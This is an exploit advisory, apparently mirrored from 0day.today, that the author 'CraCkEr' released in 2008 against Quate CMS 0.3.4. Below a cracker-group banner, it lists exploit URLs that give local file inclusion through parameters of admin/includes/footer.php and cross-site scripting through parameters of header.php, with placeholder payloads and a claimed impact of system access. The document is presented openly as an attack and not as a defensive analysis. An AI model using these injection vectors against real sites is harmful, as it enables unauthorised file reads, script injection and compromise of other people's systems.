Quate CMS 0.3.4 (LFI/XSS) Multiple Remote Vulnerabilities

2008-08-06T00:00:00
ID 1337DAY-ID-3512
Type zdt
Reporter CraCkEr
Modified 2008-08-06T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Quate CMS 0.3.4 (LFI/XSS) Multiple Remote Vulnerabilities
=========================================================



-----------------------------------------------------------------------------¬
¦¦                             C r a C k E r                                --
--          T H E   C R A C K   O F   E T E R N A L   M I G H T             ¦¦
L-----------------------------------------------------------------------------

 -----      From The Ashes and Dust Rises An Unimaginable crack....      ----¬
-----------------------------------------------------------------------------¬
--               [ Local File Include ] [ XSS ]                             --
L-----------------------------------------------------------------------------
:   Author   : CraCkEr                : :                                    :
¦   Group    : N/A                    ¦ ¦                                    ¦
¦   Script   : Quate CMS 0.3.4        ¦ ¦         Register Globals :         ¦
¦   Download : quate.net              ¦ ¦                                    ¦
¦   Method   : GET                    ¦ ¦          [-] ON   [ ] OFF          ¦
¦   Critical : High [--------]        ¦ ¦                                    ¦
¦   Impact   : System access          ¦ ¦                                    ¦
¦ ------------------------------------- L----------------------------------- ¦
¦                              DALnet #crackers                             --
L-----------------------------------------------------------------------------
:                                                                            :
¦  Release Notes:                                                            ¦
¦  =============                                                             ¦
¦  Typically used for remotely exploitable vulnerabilities that can lead to  ¦
¦  system compromise.                                                        ¦
¦                                                                            ¦

-----------------------------------------------------------------------------¬
--                             Exploit URL's                                --
L-----------------------------------------------------------------------------

[LFI]
  
http://localhost/path/admin/includes/footer.php?row_secure[account_theme]=[LFI]
http://localhost/path/admin/includes/footer.php?admin_template_default=[LFI]

[XSS]

http://localhost/path/admin/includes/themes/default/header.php?page_area=[XSS]
http://localhost/path/admin/includes/themes/default/header.php?page_header=[XSS]

   
L-----------------------------------------------------------------------------
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

-----------------------------------------------------------------------------¬
--                              © CraCkEr 2008                              --
L-----------------------------------------------------------------------------



#  0day.today [2018-03-19]  #